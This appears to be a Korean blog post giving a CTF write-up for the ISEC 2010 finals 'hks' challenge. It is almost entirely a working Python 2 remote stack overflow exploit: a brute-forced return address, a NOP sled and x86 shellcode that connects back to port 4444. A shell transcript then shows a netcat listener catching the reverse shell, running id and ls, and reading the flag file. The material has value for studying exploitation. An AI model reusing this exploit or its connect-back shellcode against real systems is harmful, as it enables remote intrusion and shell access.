CTF

ISEC 2010 본선 CTF - hks

pwn3r_45 2011. 9. 17. 22:20
exploit.py

#!/usr/bin/python

from socket import *
import time

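def pack(data):
 """Return the low 32 bits of ``data`` as a 4-byte little-endian str.

 Each round emits the least-significant byte and shifts the value down
 by one byte. Bits above 32 are silently dropped; a negative value comes
 out in two's-complement form (-1 gives four 0xff bytes). The result is
 a str because the rest of this Python 2 script concatenates it into the
 request buffer it sends over the socket.
 """
 res = ""
 for _ in range(4):
  res += chr(data % 0x100)
  # Floor division on purpose: the original `/` is floor division only
  # under Python 2; under Python 3 it yields a float and the next chr()
  # call raises TypeError. `//` behaves the same on both.
  data //= 0x100
 return res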

# Target service the loop below connects to, once per address guess.
HOST = "192.168.123.129"
PORT = 1127
# Opaque machine code placed after the NOP sled. NOTE(review): the leading
# `push` immediates look like they embed a callback address and port 4444,
# matching the `nc -lv 4444` listener in the transcript below -- confirm by
# disassembly rather than trusting this reading.
SHELLCODE = \
"\x68\xc0\xa8\x7b\x83\x68\xff\x02\x11\x5c\x89\xe7\x31\xc0" + \
"\x50\x6a\x01\x6a\x02\x6a\x10\xb0\x61\xcd\x80\x57\x50\x50" + \
"\x6a\x62\x58\xcd\x80\x50\x6a\x5a\x58\xcd\x80\xff\x4f\xe8" + \
"\x79\xf6\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3" + \
"\x50\x54\x53\x50\xb0\x3b\xcd\x80"

# Brute-force of the saved return address: candidate stack addresses are
# walked downward from 0xbfbfeb64 to 0xbfbfe000 in 20-byte steps, and one
# crafted request is sent per guess. The fixed window only makes sense on
# a non-randomised stack. Nothing here detects success, so the loop keeps
# sending after a shell has connected back; there is no try/except, so a
# refused connection raises and aborts the script; and no socket timeout
# is set, so a service that stops answering blocks the loop in recv().
for ret in range(0xbfbfeb64 , 0xbfbfe000 , -20):
 # The loop variable is rebound from int to its 4-byte little-endian str.
 ret = pack(ret)
 # Request layout: presumably the service's command keyword, then 26 bytes
 # of filler up to the return-address slot -- TODO confirm against hksd.
 payload = "ls"
 payload += "\x90"*26
 payload += ret
 # Two bytes following the address; their meaning is not clear from here.
 payload += "\x04\x00"
 # 0x90 is x86 NOP: a 150-byte sled so an imprecise address guess that
 # lands anywhere in it still runs into SHELLCODE.
 payload += "\x90"*150
 payload += SHELLCODE
 payload += "\x90"*5
 # Fresh TCP connection per attempt: read the banner, send the request,
 # read the reply, pause briefly, close.
 s = socket(AF_INET , SOCK_STREAM)
 s.connect((HOST , PORT))
 s.recv(1024)
 s.send(payload)
 s.recv(1024)
 time.sleep(0.2)
 s.close()



[pwn3r@localhost hks]$ ./exploit.py & nc -lv 4444
[1] 14024
Connection from 192.168.123.129 port 4444 [tcp/krb524] accepted
id
uid=1009(hks) gid=1009(hks) groups=1009(hks)
ls -l
total 1220
-rwxr-xr-x  1 hks   hks  595672 Sep 14 23:46 hksd
-rw-r--r--  1 hks  hks      33 Sep 14 23:46 key
cat key
2kscwfu0kqsgbdl1m7l56b01ghpmwzho